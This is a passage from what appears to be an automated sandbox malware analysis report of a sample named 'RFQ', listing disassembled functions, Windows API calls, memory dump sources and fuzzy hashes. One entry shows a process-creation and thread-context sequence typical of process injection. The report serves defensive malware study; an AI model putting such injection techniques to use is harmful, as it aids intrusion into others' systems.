                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1552873950-0
                                                                                                                                                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                                                    • Instruction ID: 54401c58efd7b6ffda16c1b0b1af8211e51ca79dd9c2330a6cc98d3e2a7f68f3
                                                                                                                                                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                                                    • Instruction Fuzzy Hash: F9516DB1A04218EFDF159F64DC85BADBBB9EF48304F1040AEF61DA3241DB756A908F58
                                                                                                                                                    Function 0077C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0077C72F
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0077C746
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                    • String ID: aut
                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                    • Opcode ID: 0716a94fcf274ec3d917b95d069cb2182c83ac144023417bb7ae23e318fef83f
                                                                                                                                                    • Instruction ID: 1de3458799a9456a5ee7c5b992b3f35f298fe352444422311c4eb1830af4a0b5
                                                                                                                                                    • Opcode Fuzzy Hash: 0716a94fcf274ec3d917b95d069cb2182c83ac144023417bb7ae23e318fef83f
                                                                                                                                                    • Instruction Fuzzy Hash: CCD05E7150030EAFDB20AB90DC0EFCA776CA704708F0042A07650A50B2EBF8EA998B58
                                                                                                                                                    Function 0078F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9309ab0cbf4320611284c2e206dde8ba0005ef4f2df537c9f702cc2a84c51b23
                                                                                                                                                    • Instruction ID: b169769ac13cdd9ad9aa952008324dbab7a8c10eba6bfb9dabdca16a2bd5d458
                                                                                                                                                    • Opcode Fuzzy Hash: 9309ab0cbf4320611284c2e206dde8ba0005ef4f2df537c9f702cc2a84c51b23
                                                                                                                                                    • Instruction Fuzzy Hash: 8BF15A71604301DFCB10EF24C895B5ABBE5FF88314F10892EF9999B292D738E905CB92
                                                                                                                                                    Function 00734FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00735022
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007350CB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell__memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 928536360-0
                                                                                                                                                    • Opcode ID: d1c7ac754a6729befabc57f3ed08463392a40c5ac51a7d708fc289479147835f
                                                                                                                                                    • Instruction ID: 3df7a7127b6e73367e2a7265298c942288afb12752b06a7002999acfbc9d0f51
                                                                                                                                                    • Opcode Fuzzy Hash: d1c7ac754a6729befabc57f3ed08463392a40c5ac51a7d708fc289479147835f
                                                                                                                                                    • Instruction Fuzzy Hash: A131D2B1604701CFD725DF34D8446ABBBE8FF48304F00492EF59A83241E77AA944CBA6
                                                                                                                                                    Function 0075395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00753973
                                                                                                                                                      • Part of subcall function 007581C2: __NMSG_WRITE.LIBCMT ref: 007581E9
                                                                                                                                                      • Part of subcall function 007581C2: __NMSG_WRITE.LIBCMT ref: 007581F3
                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0075397A
                                                                                                                                                      • Part of subcall function 0075821F: GetModuleFileNameW.KERNEL32(00000000,007F0312,00000104,00000000,00000001,00000000), ref: 007582B1
                                                                                                                                                      • Part of subcall function 0075821F: ___crtMessageBoxW.LIBCMT ref: 0075835F
                                                                                                                                                      • Part of subcall function 00751145: ___crtCorExitProcess.LIBCMT ref: 0075114B
                                                                                                                                                      • Part of subcall function 00751145: ExitProcess.KERNEL32 ref: 00751154
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    • RtlAllocateHeap.NTDLL(01020000,00000000,00000001,00000001,00000000,?,?,0074F507,?,0000000E), ref: 0075399F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1372826849-0
                                                                                                                                                    • Opcode ID: b5446ada5e2392771752b50e02de7f17076cea6e238a9cf9b0fa8fbdbefc7fa7
                                                                                                                                                    • Instruction ID: d924328d17ccafa1d937c84e91e70e0657a8ea0d2b959fd0870c6cc0b17df534
                                                                                                                                                    • Opcode Fuzzy Hash: b5446ada5e2392771752b50e02de7f17076cea6e238a9cf9b0fa8fbdbefc7fa7
                                                                                                                                                    • Instruction Fuzzy Hash: 31012B72244205DAE6113B24EC0ABED234C9B81797F200025FD04D72A2DBFCAD0886A0
                                                                                                                                                    Function 0077C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0077C385,?,?,?,?,?,00000004), ref: 0077C6F2
                                                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0077C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0077C708
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,0077C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0077C70F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                    • Opcode ID: f9ed6921fb626db1eb1b16deb64943635b00f498bb0ca7c85fa77e62188d271c
                                                                                                                                                    • Instruction ID: 2b69f03eb674e5315d404e6c2d6f33fbdd8b95f4be66ecde2db4d6fcc94a04bd
                                                                                                                                                    • Opcode Fuzzy Hash: f9ed6921fb626db1eb1b16deb64943635b00f498bb0ca7c85fa77e62188d271c
                                                                                                                                                    • Instruction Fuzzy Hash: CEE08632140218B7DB311B58AC09FCA7B58AB09760F148210FB14790E1A7B52911879C
                                                                                                                                                    Function 0077BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0077BB72
                                                                                                                                                      • Part of subcall function 00751C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00757A85), ref: 00751CB1
                                                                                                                                                      • Part of subcall function 00751C9D: GetLastError.KERNEL32(00000000,?,00757A85), ref: 00751CC3
                                                                                                                                                    • _free.LIBCMT ref: 0077BB83
                                                                                                                                                    • _free.LIBCMT ref: 0077BB95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                                                    • Instruction ID: 4109e66c27ae4ad7c49a4a5d7ed1f6f3073c419255af36903aa4195f5c035bdd
                                                                                                                                                    • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                                                    • Instruction Fuzzy Hash: CAE0E2A564174186DE24A679AE48FF323CC4B043A2B54081EBC6DE7186EF68F84489B8
                                                                                                                                                    Function 00732322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 007322A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007324F1), ref: 00732303
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007325A1
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00732618
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 007A503A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3815369404-0
                                                                                                                                                    • Opcode ID: 8ae23bf4d05324e19add38a6ea58bb491e5f8974373cbe5821fe68525841fc92
                                                                                                                                                    • Instruction ID: cf81928593ca2d356789ebc1777527823dd78645b8f67df6e80321fffd33439d
                                                                                                                                                    • Opcode Fuzzy Hash: 8ae23bf4d05324e19add38a6ea58bb491e5f8974373cbe5821fe68525841fc92
                                                                                                                                                    • Instruction Fuzzy Hash: 9A71ACB4A01285CAC314EFABA9955B5BBA8BBA8354FC0C26ED119C7772CB3D4411CF1D
                                                                                                                                                    Function 00790828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strcat.LIBCMT ref: 007908FD
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0079098C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1012013722-0
                                                                                                                                                    • Opcode ID: e3cada8df0aafcbfd05481ac78cf7efb32346807555580c138d27adb2ed0e93d
                                                                                                                                                    • Instruction ID: 3869094993be4f326eea5b7c0503e1584489fa98301966a31c9b5b14a53c7474
                                                                                                                                                    • Opcode Fuzzy Hash: e3cada8df0aafcbfd05481ac78cf7efb32346807555580c138d27adb2ed0e93d
                                                                                                                                                    • Instruction Fuzzy Hash: 9F912875A10605DFCB18EF28D4959A9B7E5FF59310B51C06AE81A8F3A2DB38ED41CBC0
                                                                                                                                                    Function 00733A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00733A73
                                                                                                                                                      • Part of subcall function 00751405: __lock.LIBCMT ref: 0075140B
                                                                                                                                                      • Part of subcall function 00733ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00733AF3
                                                                                                                                                      • Part of subcall function 00733ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00733B08
                                                                                                                                                      • Part of subcall function 00733D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00733AA3,?), ref: 00733D45
                                                                                                                                                      • Part of subcall function 00733D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00733AA3,?), ref: 00733D57
                                                                                                                                                      • Part of subcall function 00733D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,007F1148,007F1130,?,?,?,?,00733AA3,?), ref: 00733DC8
                                                                                                                                                      • Part of subcall function 00733D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00733AA3,?), ref: 00733E48
                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00733AB3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 924797094-0
                                                                                                                                                    • Opcode ID: d371ce6973a0584c55f795c32effe9fc83166e400016beafca31e88a0aaa57f2
                                                                                                                                                    • Instruction ID: 7969f8cf2c19ebd9fa57be5a1dc05fdb698cd719af129e34ae852a19e514704d
                                                                                                                                                    • Opcode Fuzzy Hash: d371ce6973a0584c55f795c32effe9fc83166e400016beafca31e88a0aaa57f2
                                                                                                                                                    • Instruction Fuzzy Hash: C011C371904340DBC310DF29D849A5ABBE4EF94310F40C51EF445872A2DB788555CBAA
                                                                                                                                                    Function 0075E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___lock_fhandle.LIBCMT ref: 0075EA29
                                                                                                                                                    • __close_nolock.LIBCMT ref: 0075EA42
                                                                                                                                                      • Part of subcall function 00757BDA: __getptd_noexit.LIBCMT ref: 00757BDA
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1046115767-0
                                                                                                                                                    • Opcode ID: ce996917d603d4683410900d0326159328e6eb78776a1f8128270ad1bbb707a1
                                                                                                                                                    • Instruction ID: 4a5bd6da1f21927d91b68c4a363a3cdd38698d22b1dac53a35f55761b25532c7
                                                                                                                                                    • Opcode Fuzzy Hash: ce996917d603d4683410900d0326159328e6eb78776a1f8128270ad1bbb707a1
                                                                                                                                                    • Instruction Fuzzy Hash: 2C11A3B2809610CAD71ABB74D8453E83A516F82333F268350EC205B2E3C7FC9A08C6A5
                                                                                                                                                    Function 0074F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0075395C: __FF_MSGBANNER.LIBCMT ref: 00753973
                                                                                                                                                      • Part of subcall function 0075395C: __NMSG_WRITE.LIBCMT ref: 0075397A
                                                                                                                                                      • Part of subcall function 0075395C: RtlAllocateHeap.NTDLL(01020000,00000000,00000001,00000001,00000000,?,?,0074F507,?,0000000E), ref: 0075399F
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0074F51E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0074F533
                                                                                                                                                      • Part of subcall function 00756805: RaiseException.KERNEL32(?,?,0000000E,007E6A30,?,?,?,0074F538,0000000E,007E6A30,?,00000001), ref: 00756856
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3902256705-0
                                                                                                                                                    • Opcode ID: 45aa0562ac5d45dcc7b7cebe107d3e864097ec382244eed0cfc1e768e543d7ae
                                                                                                                                                    • Instruction ID: 45db3352d61745e08208c6a1f2ff7c4834442799529a7da30716b087fa539d72
                                                                                                                                                    • Opcode Fuzzy Hash: 45aa0562ac5d45dcc7b7cebe107d3e864097ec382244eed0cfc1e768e543d7ae
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0AF7110421EE7DB14BF98D805ADEB7A8AF04355FA08436FD08A2181EFF89A4886E5
                                                                                                                                                    Function 007535E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    • __lock_file.LIBCMT ref: 00753629
                                                                                                                                                      • Part of subcall function 00754E1C: __lock.LIBCMT ref: 00754E3F
                                                                                                                                                    • __fclose_nolock.LIBCMT ref: 00753634
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                                    • Opcode ID: db841a00cd15d240b8b6aaf2615a99fb16cb45ca59e6d8f217161594e3601b1b
                                                                                                                                                    • Instruction ID: c62aa92a77455973d99880241732310f0916fbdeae06da2ae96df4684ecf44ef
                                                                                                                                                    • Opcode Fuzzy Hash: db841a00cd15d240b8b6aaf2615a99fb16cb45ca59e6d8f217161594e3601b1b
                                                                                                                                                    • Instruction Fuzzy Hash: E3F0BB71801204EAD7117B75880A7DE76A0AF41377F65814DEC10AB2E1C7FC87099F95
                                                                                                                                                    Function 01064F1D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 010656DB
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01065771
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01065793
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                                                    • Instruction ID: 3d0443d1a6b53e926dac107f74650f9b23ffc99f67f2275f9fef728f3f2282f8
                                                                                                                                                    • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                                                    • Instruction Fuzzy Hash: BA12ED24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A4F81CF5A
                                                                                                                                                    Function 0073E8A0 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
